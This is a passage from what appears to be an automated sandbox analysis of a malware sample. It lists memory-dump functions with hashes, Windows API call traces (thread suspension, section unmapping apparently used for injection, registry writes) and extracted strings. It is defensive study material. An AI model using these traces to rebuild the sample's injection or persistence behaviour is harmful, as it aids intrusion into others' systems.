    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
